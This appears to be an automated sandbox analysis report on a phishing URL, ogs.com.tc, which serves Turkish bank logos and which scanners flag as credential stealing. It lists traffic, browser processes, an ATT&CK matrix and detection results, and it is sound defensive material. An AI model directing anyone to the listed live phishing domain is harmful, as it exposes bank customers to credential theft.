Source: global trafficHTTP traffic detected: GET /assets/images/banks/garanti.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/halk.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/hsbc.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/ykb.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/ziraat.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/ptt.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/teb.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/isbank.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/odea.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/favicon-196x196.png HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/halk.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/garanti.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/finans.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/fiba.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/hsbc.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/favicon-196x196.png HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: ogs.com.tc
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: chromecache_92.2.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Open
Source: chromecache_92.2.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Roboto
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqW106F15M.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWt06F15M.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtE6F15M.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtU6F15M.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtk6F15M.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWu06F15M.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWuU6F.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWuk6F15M.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWvU6F15M.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWxU6F15M.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS2mu1aB.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSCmu1aB.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSGmu1aB.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSymu1aB.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTUGmu1aB.woff2)
Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTVOmu1aB.woff2)
Source: chromecache_128.2.drString found in binary or memory: https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufA5qW54A.woff2)
Source: chromecache_128.2.drString found in binary or memory: https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufB5qW54A.woff2)
Source: chromecache_128.2.drString found in binary or memory: https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufC5qW54A.woff2)
Source: chromecache_128.2.drString found in binary or memory: https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufD5qW54A.woff2)
Source: chromecache_128.2.drString found in binary or memory: https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufJ5qW54A.woff2)
Source: chromecache_128.2.drString found in binary or memory: https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufN5qU.woff2)
Source: chromecache_128.2.drString found in binary or memory: https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufO5qW54A.woff2)
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: classification engineClassification label: mal72.win@16/92@6/5
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2252,i,3500489096609477459,16314723359328106391,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ogs.com.tc/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2252,i,3500489096609477459,16314723359328106391,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder		1
Process Injection		1
Masquerading		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder		1
Process Injection		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
https://ogs.com.tc/100%Avira URL Cloudphishing
https://ogs.com.tc/15%VirustotalBrowse
https://ogs.com.tc/100%SlashNextCredential Stealing type: Phishing & Social Engineering

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
www.google.com0%VirustotalBrowse
fp2e7a.wpc.phicdn.net0%VirustotalBrowse
ogs.com.tc9%VirustotalBrowse
bg.microsoft.map.fastly.net0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://ogs.com.tc/assets/images/banks/teb.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/albaraka.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/akbank.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/alternatif.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/turkiyefinans.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/fiba.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/halk.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/js/script.js100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/favicon-196x196.png100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/garanti.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/kuveyt.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/deniz.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/vakif.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/finans.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/sekerbank.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/ykb.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/1.png100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/ziraat.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/anadolu.jpg100%Avira URL Cloudphishing
